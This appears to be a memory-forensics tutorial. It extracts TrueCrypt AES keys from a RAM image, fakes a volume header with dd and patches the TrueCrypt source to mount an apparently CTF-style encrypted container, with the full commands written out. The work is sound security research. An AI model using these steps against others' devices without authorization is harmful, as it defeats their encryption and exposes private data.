Decrypting and Mounting a TrueCrypt Volume using Cryptographic Keys Extracted from Memory Analyzing the Protected TrueCrypt Volume The first thing we need to do is make sure that we are, in fact, dealing with an encrypted TrueCrypt volume. TrueCrypt volumes are identified based on certain characteristics such as sizes that are multiple of 512 (block size of cipher mode), missing headers, etc. Volatility framework offers a ‘TrueCryptsummary’ plugin that can be used to locate information germane to TrueCrypt within our memory image [Figure 7]. Figure 7 Looking at the results, we know that TrueCrypt 7.0a was being used on the system and the protected volume was mounted while the memory was dumped. Also, we notice that ‘ppp.challange.vol’ is the TrueCrypt container. Understanding Cryptographic Keys TrueCrypt provides ‘on-the-fly‘ encryption, which means that the cryptographic keys have to be loaded in memory at all times while the protected TrueCrypt volume is mounted. By default, TrueCrypt uses AES encryption along with XTS, and the 256 bit primary and secondary keys are concatenated together to form one master key of 512 bits. You may search for these keys on RAM (system memory) or ‘hiberfile.sys’ (a file created during hibernation). Here, it is important to note that hiberfile.sys can only be expected to contain the keys if the protected TrueCrypt volume was mounted while the system went into hibernation. In case the protected volume was dismounted during hibernation, it is futile to look for the cryptographic keys on the RAM dump or hiberfile.sys. The keys are not stored on disk due to obvious security concerns Mic3. Searching for Cryptographic Keys in Memory Before we can extract keys from memory, we need to identify them. One approach is to attempt decryption of known plaintext using every possible combination of bytes. However, in the presence of bit errors in memory, this approach gets highly convoluted JAl084. Another approach is to cycle through each byte in memory and to treat the following block of a certain size as a key schedule. Then, a hamming distance is calculated pertaining to this word and the word that should have been generated based on surrounding words. If the number of bits that violate constraints germane to correct key schedule is small, the key is discovered JAl084. ‘Aeskeyfind’ implements this approach, and we use it to search for AES keys in our memory image [Figure 8]. Figure 8 Alternatively, you can use ‘bulk extractor’ to locate keys in memory [Figure 9]. Note that this tool also locates other information in memory such as emails, IP addresses, URLs, etc.\ Figure 9\ Figure 10 Figure 11 At this point, we know the two 256 bit primary and secondary AES keys and we can use these to mount the protected volume. However, we first need to fake a header. Faking a TrueCrypt Header Since we do know the actual passphrase pertaining to the protected volume, we will create a template containing a known passphrase and copy this to the protected volume. Later, we can use this known passphrase and the extracted AES keys to mount or decrypt the protected volume. ./TrueCrypt –text –create –encryption=aes –filesystem=FAT –hash=RIPEMD-160 –password=pranshu –random-source=/dev/random –size=33600000 –volume-type=normal anothvol Figure 12 Here, we are using TrueCrypt in ‘text’ mode to create a volume with default AES encryption, RIPEMD-160 hash, and a FAT file system. Please note that the size of the encrypted volume is 33.6 MB or 33600000 bytes. We need this TrueCrypt volume (with known password) to be of the same size [Figure 12]. In order to copy header information from this volume to the protected volume, we use ‘dd’ [Figure 13]: dd bs=512 count=1 conv=notrunc if=/root/TrueCrypt/Main/anothvol of=/root/ppp.challenge.vol Figure 13 Hard Coding Keys into TrueCrypt Source Code We now need to “patch” TrueCrypt so that it accepts the discovered AES keys. Here, we have patched TrueCrypt 7.1 (see Downloads above). For this purpose, we modify the ‘VolumeHeader.cpp’ file and hard code the AES keys in there Mic15 [Figure 14]. Figure 14 Now, we compile this modified source code and attempt to mount the protected volume using the known password [Figure 15]. ./TrueCrypt –text –mount-options=readonly –password=pranshu /root/ppp.challenge.vol /mnt/pranshu Figure 15 We have successfully mounted the protected TrueCrypt volume at ‘/mnt/pranshu/’ using the known password and hard coded AES keys. We can now view the sensitive file inside the volume [Figure 16]. Figure 16 Conclusion The purpose of this paper—like many researchers who studied and implemented attacks on TrueCrypt—is to make a TrueCrypt user aware of what protection is truly being offered. A false sense of security is highly perilous. For instance, it is imprudent to neglect physical security of the device while using TrueCrypt lest you fall prey to a bootkit attack or a DMA attack. On the other hand, keeping the protected volume mounted at all times, or for extended periods, increases the likelihood of getting cryptographic keys stolen from memory. Note that we have intentionally avoided discussing any commercial recovery software in this paper. As of this writing, there is a vague warning on TrueCrypt website that apprises users of “security issues” in TrueCrypt. There is no detailed information on this warning yet, however, if you wish to pay heed to it, you may use ‘Veracrypt’ as an alternative to TrueCrypt. References [1] Wikipedia. [Online]. http://en.wikipedia.org/wiki/Rootkit#Bootkits [2] Joanna Rutkowska Alex Tereshkin. The Invisible Things Lab’s blog. [Online]. http://theinvisiblethings.blogspot.com/2009/10/evil-maid-goes-after-TrueCrypt.html [3] Michael Ligh. Volatility Labs. [Online]. http://volatility-labs.blogspot.com/2014/01/TrueCrypt-master-key-extraction-and.html [4] Seth D. Schoen, Nadia Heninger, William Clarkson, Joseph A. Calandrino, Ariel J. Feldman, Jacob Appelbaum, Edward W. Felten. J. Alex Halderman, “Lest We Remember: Cold Boot Attacks on Encryption Keys,” in Proc. 17th USENIX Security Symposium (Sec ’08), San Jose, CA, 2008. [5] Michael Weissbacher. Michael Weissbacher. [Online]. http://mweissbacher.com/blog/2011/05/17/plaidctf-writeup-fun-with-firewire/ [6] Michael Ligh, “Mastering TrueCrypt: Windows 8 and Server 2012 Memory Forensics,” in Open Memory Forensics Workshop, 2013. Source
×
×
  • Create New...